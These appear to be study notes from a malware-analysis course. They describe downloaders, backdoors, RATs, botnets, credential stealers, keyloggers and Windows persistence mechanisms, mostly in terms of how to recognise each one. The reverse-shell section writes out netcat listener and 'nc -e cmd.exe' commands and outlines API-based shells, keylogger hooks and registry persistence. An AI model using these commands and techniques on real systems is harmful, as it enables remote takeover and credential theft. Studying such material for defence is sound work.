# Malware Behaviour ### Downloaders *Downloaders* simply download another piece of malware from the internet and execute it on the local system. Downloaders are often packaged with an exploit. - Downloaders often use `URLDownloadToFileA` - Followed by a call to `WinExec` - To download and execute the new malware - Are often called *droppers* ### Launchers A launcher is any executable that installs malware for immediate or future covert execution. - Often contains the malware payload embedded within the file ### Backdoors A *backdoor* is a type of malware that provides an attacker with remote access to a victim’s machine. Backdoor code often implements a full set of capabilities so when using a backdoor, attackers don't need to download additional malware or code. - Common variants - Reverse Shells - Remote Access Trojans (RATs) - Botnets - Commonly communicate over port 80 using `HTTP` - `HTTP` is the most commonly used protocol for outgoing network traffic - So it offers the malware the best chance of blending in to normal traffic - Often provide a common set of functionality - Manipulate registry keys - Enumerate display windows - Create directories - Search for files - Can determine the functionality provided by looking at the Windows API functions imported #### Reverse Shell A reverse shell is a connection that originates from an infected machine and provides attackers shell access to that machine. - The simplest type of backdoor - Provides the attacker with a standard shell - Offers same functionality as being logged into the machine - Called a reverse shell because rather than the attacker connecting to the infected machine, the infected machine connects back to the attacker’s machine - This is done as the victim's machine is often sitting behind a firewall blocking incoming traffic on most ports. - Whereas outgoing traffic on random high-numbered ports is often unblocked - Either offered standalone or as part of a more sophisticated backdoor ##### Creating a reverse shell ###### Using Netcat - Can be created quite simply using the `netcat` program - This is done by setting up a listener on the attacker’s machine - Example: ```bash nc -l -p 80 ``` - Where `-l` is the listen flag and `-p` is the port flag to listen on 80 - Then netcat is run on the victim’s machine - Example: ```bash nc 80 -e cmd.exe ``` - The `-e` option is the program to execute over the connection once the connection is established - Tying std input and std output from the program to the network socket ###### Using Windows API This can be done in two ways: basic and multi-threaded The **basic** method is popular as it is easy to write and achieves the same thing. It uses a call to `CreateProcess` and manipulates the `STARTUPINFO` structure. 1. First a socket to the remote server is established 2. That socket’s standard streams are stored and spliced into `STARTUPINFO` 3. So that when `CreateProcess` is called with the `STARTUPINFO` passed in, standard input, output and error are piped to the attacker The multithreaded approach is the same, except instead of tying the streams from the command line directly to the socket, two threads sit in between (one for input, one for output). These threads can be used to encrypt and decrypt data so it is not sent in the clear. - API calls `CreateThread` and `CreatePipe` should be looked for - The two pipes are needed to redirect input and output to the thread - Two threads are needed - One for reading from the stdin pipe and writing to the socket - One for reading from the socket and writing to the stdout pipe - Then the `CreateProcess` method can be used to tie the standard streams to the pipes instead of directly to the socket. ### Remote Administration Tool (RAT) - Often used in targeted attacks with a specific goal - Typically communicate over common ports (e.g. 80 and 443) - RAT server runs on the victim, implanted within malware - Client runs remotely as a command and control unit operated by attacker - Server connects back to the server to start a connection, then controlled by the client (the attacker) ![1652975874.png](img/1652975874.png) Server will poll the client for new commands - there is not a permanent connection (so as not to arouse suspicion) ### Botnet - Botnet is a collection of compromised hosts (known as zombies) - Controlled by a single entity through the use of a server - Goal of a botnet to compromise as many hosts as possible | RATs | BotNet | | ------------------------------ | ------------------------------ | | Typically control fewer hosts | Infect millions | | Used in targeted attacks | Used in mass attack | | Controlled on per-victim level | All zombies controlled at once | ### Credential Stealing - Attackers will go to great lengths to steal credentials - Three general approaches - Programs that wait for a user to log in - Programs that dump information stored in Windows (e.g password hashes) - Programs that log keystrokes #### Windows Login - Windows enables you to extend the login mechanism - In Windows XP, this was done by the *Graphical Identification* *and Authentication* (GINA) API - Later Windows versions use *Credential Provider* - Possible to use these to install credential stealers by pretending to be a credential provider Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `dll` to a malicious one. ##### Hash Dumping - Another popular method of obtaining Windows credentials is *hash dumping* - Aim is to copy the password hashes off system - Don't get the password, but often get an equivalent - Source code for several tools is available, often used by malware authors - But also recognised by antivirus authors - therefore malware authors modify it slightly ### Keyloggers - Intercepting Windows login or hash dumping will only provide details of the username and password to log into the computer - Will not provide details of other resources - Alternative approach is to log user key presses - This will capture any password typed into the system - Keyloggers can be implemented in both kernel space and user space - Kernel-based is very difficult to detect with user-level applications - Frequently used as part of a rootkit - Acting as a keyboard driver to capture keystrokes bypasses user-space programs and protections #### User-space keyloggers - Windows API provides two ways to implement a keylogger in user-space - Hooking - get Windows to notify the malware every time a key is pressed - Hooking typically makes use of `SetWindowsHookEx()` - Can alter key presses as well - Typically will include an `.exe` which will initiate the hook function - And a `dll` to handle the logging - This `dll` is injected to other processes on the system - Polling - malware interrogates Windows to see if a specific key is pressed - Make use of the `GetAsyncKeyState()` API function which returns a boolean - All the keys are iterated through to see what specific key is pressed - `GetForegroundWindow()` - shows window title ###### Identifying Keyloggers - If malware wants to log all keys, then it will need to have names for keys like `[Num Lock]`, `[Page Up]`, `[Page Down]` or the cursor keys - Might also have strings such as `qwerty...vbnm` present ## Persistence Mechanisms - Various ways malware can get on a system - But also needs to ensure it stays on the system for a long time - Otherwise rebooting the system would be enough to clear it - Various mechanisms are available for the malware to hook in ###### Via Registry - Various places in the Windows Registry that can be used to install malware permanently - Most popular is to register under: - `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` - Tools available that can show all the programs that will automatically run on your system - Note that the mechanisms available change as Windows develops ###### Image File Executable Options - One option is the image File Execution Options in the registry - Aimed at letting you debug a program - Set at: - `HKLM\Software\Microsoft\Windows NT\CurrentVersion\ImageFileExecution Options\{exe}` - Can set a key here called debugger which contains the full path to the debugger (or your malware) - Set this on a program that is likely to run and the malware will be launched when the program is run - Can also be used for malware analysis ###### SVCHOST DLLs - Malware often installed as a Windows service - But typically requires implementing as an `exe` - However, Windows provides `svchost.exe` that lets you implement a service as a `dll` - Many Windows services are implemented as a `DLL` using `svchost.exe` - Causes the malware to blend into the process list and registry better